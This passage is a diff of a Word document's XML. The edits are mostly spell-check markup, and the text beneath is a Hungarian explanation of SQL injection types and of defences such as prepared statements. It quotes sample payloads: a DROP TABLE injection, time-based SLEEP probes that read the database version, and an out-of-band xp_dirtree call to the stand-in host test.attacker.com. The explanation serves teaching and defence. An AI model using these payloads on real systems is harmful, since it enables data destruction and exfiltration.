+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>classic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="8"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4845,46 +5360,48 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>105; DROP TABLE Suppliers</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[2]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Így a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">tényleges </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">lekérdezés </w:t>
-      </w:r>
+        <w:t xml:space="preserve">105; DROP TABLE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT</w:t>
+        <w:t>Suppliers</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Így a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tényleges </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lekérdezés </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4892,7 +5409,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>SELECT</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4900,7 +5417,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>*</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4908,7 +5425,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>*</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4916,7 +5433,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>FROM</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4924,7 +5441,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>FROM</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4932,23 +5449,25 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Users</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>Users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>WHERE</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4956,7 +5475,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>WHERE</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4964,23 +5483,25 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>UserId</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>UserId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>=</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4988,7 +5509,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4996,7 +5517,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>105;</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5004,7 +5525,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>105;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5012,7 +5533,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>DROP</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5020,7 +5541,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>DROP</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5028,7 +5549,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>TABLE</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5036,7 +5557,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>TABLE</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5044,15 +5565,16 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Su</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>s</w:t>
+        <w:t>Su</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5060,8 +5582,17 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>ppliers</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:vertAlign w:val="superscript"/>
@@ -5169,7 +5700,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (error-based)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>error-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5386,19 +5931,31 @@
       <w:r>
         <w:t>Vak (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>blind</w:t>
       </w:r>
-      <w:r>
-        <w:t>, inferential</w:t>
-      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>inferential</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="9"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5543,7 +6100,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (boolean-based)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>boolean-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5687,7 +6258,97 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
+        <w:t xml:space="preserve"> SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>title</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>description</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>doby</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>items</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5930,7 +6591,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(time-based) </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>time-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5974,11 +6649,19 @@
         </w:rPr>
         <w:t xml:space="preserve">például </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">MySQL-ben a legkézenfekvőbb megoldást a </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-ben a legkézenfekvőbb megoldást a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6002,6 +6685,7 @@
         </w:rPr>
         <w:t xml:space="preserve">SELECT * FROM </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6010,75 +6694,144 @@
         </w:rPr>
         <w:t>card</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> WHERE id=1-SLEEP(15)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [5]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Következő lépésként például </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kinyerhető</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=1-SLEEP(15)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t használja adatbázisként.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Következő lépésként például </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kinyerhető</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>card</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6097,7 +6850,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a MySQL 5.x verzióját futtatja.</w:t>
+        <w:t xml:space="preserve">, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5.x verzióját futtatja.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6120,12 +6887,25 @@
         <w:t>out-of</w:t>
       </w:r>
       <w:r>
-        <w:t>-band)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="10"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6206,6 +6986,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> például a Microsoft SQL Server </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6214,6 +6995,7 @@
         </w:rPr>
         <w:t>xp_dirtree</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -6329,42 +7111,150 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' </w:t>
-      </w:r>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[6]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, amely az alábbi lekérdezést eredményezi: </w:t>
-      </w:r>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM product WHERE id=1;EXEC master..xp_dirtree ’\\test.attacker.com\’ </w:t>
+        <w:t>..</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>xp_dirtree</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> '\\test.attacker.com\' </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amely az alábbi lekérdezést eredményezi: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>product</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>xp_dirtree</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ’\\test.attacker.com\’ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6613,7 +7503,43 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Elkészített utasítások (prepared statements) használata</w:t>
+        <w:t>Elkészített utasítások (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>prepared</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>statements</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) használata</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6681,12 +7607,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>boolean-based</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -6875,7 +7803,43 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Tárolt eljárások (stored procedures) használata</w:t>
+        <w:t>Tárolt eljárások (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>stored</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
